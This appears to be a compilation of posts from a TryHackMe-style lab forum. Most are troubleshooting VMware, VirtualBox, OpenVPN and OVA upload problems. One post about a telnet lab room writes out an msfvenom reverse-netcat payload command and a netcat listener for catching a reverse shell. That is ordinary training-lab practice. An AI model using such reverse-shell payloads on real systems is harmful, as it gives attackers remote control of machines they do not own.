I was about to post here to ask for help but I solved my issue after all, so I'm posting the solution in case it helps anyone else.

I had an issue with VMware, intermittent freezes that lasted ~5 seconds, every ~30 seconds or so. After some searching I found the thread that I'm linking below, back from 2013, where basically someone describes a very similar problem that was solved after turning off the floppy drive from the Guest machine settings, as it was on auto-detect before. I didn't have a floppy drive on my Guest, so I went to settings and disabled anything that wasn't necessary. I was too bored to identify the culprit, but in any case that fixed the issue.

I am experiencing js issues with firefox(esr version), not a big deal maybe, but buggy nonetheless. The "page load progress bar" never completes. No issue w/SRIron or ungoog chrome. Realy just an FYI, but could cause some issues with leakage?

@solid jungle The box IP is the one shown once you deploy your box and it comes up in a banner on the page where it shows you the time remaining, IP, and terminate session buttons. The Try Hack Me Ip is the one shown on the access page where it says virtual internet address - you can also find this by typing ifconfig and looking at the 'tun0' address.

One of the most common problems in setting up OpenVPN is that the two OpenVPN daemons on either side of the connection are unable to establish a TCP or UDP connection with each other.

This is usually the result of:

A perimeter firewall on the server's network is filtering out incoming OpenVPN packets (by default OpenVPN uses UDP or TCP port number 1194).
A software firewall running on the OpenVPN server machine itself is filtering incoming connections on port 1194. Be aware that many OSes will block incoming connections by default, unless configured otherwise.
A NAT gateway on the server's network does not have a port forward rule for TCP/UDP 1194 to the internal address of the OpenVPN server machine.
The OpenVPN client config does not have the correct server address in its config file. The remote directive in the client config file must point to either the server itself or the public IP address of the server network's gateway.
Another possible cause is that the windows firewall is blocking access for the openvpn.exe binary. You may need to whitelist (add it to the "Exceptions" list) it for OpenVPN to work.

Anyone have any ideas why my OVA conversion would fail? Uploads fine and then goes to about 19% quickly before hanging and then it seems to go up to 26% before failing. i can open the OVA just fine when importing back in locally and it loads fine. I am doing the room "peak hill". Machine that was deployed. I tested the connection by pinging using ping command in my ubuntu, scanning using nmap and opening the IP in the browser. I have a Ubuntu 20.04 machine

if payment got reveived to TryHackMe, They will revert it back to original payment unless user who started payment write a email to support team and claim before 48hrs, else it will get reverted

Did anyone do the https://tryhackme.com/room/networkservices --telnet part of this one, because I have some problem that I can't open a reverse shell. I did follow everything to the T and it's not opening my netcat reverse shell. //
I logged into telnet
I did payload with msfvenom -p cmd/unix/reverse_netcat lhost=[ip of my machine] lport=4444
I openned up my netcat listener -- nc -lvp 4444
After I copied in the payload to telnet and I don't get the reverse shell

can someone who done it DM me please?

Hey there mates, this is not tryhackme related but virtualbox setup related. Im having trouble setting up kali/parrot on virtualbox, i have them setup with NAT and the connection is slow, when i load sites, takes up to 10 seconds to load the page, when i ping google.com, takes up to 20 second to show the IP where the system is sending the ICMP to and then ten seconds to get a response from them. Did anyone have this problem?

Hi all, newbie here, and I'm having problems connecting to the "Blue" machine. :(
I've tried everything, reboot the vm, restart OpenVPN on VM, restart OpenVPN on host, reboot host, everything...
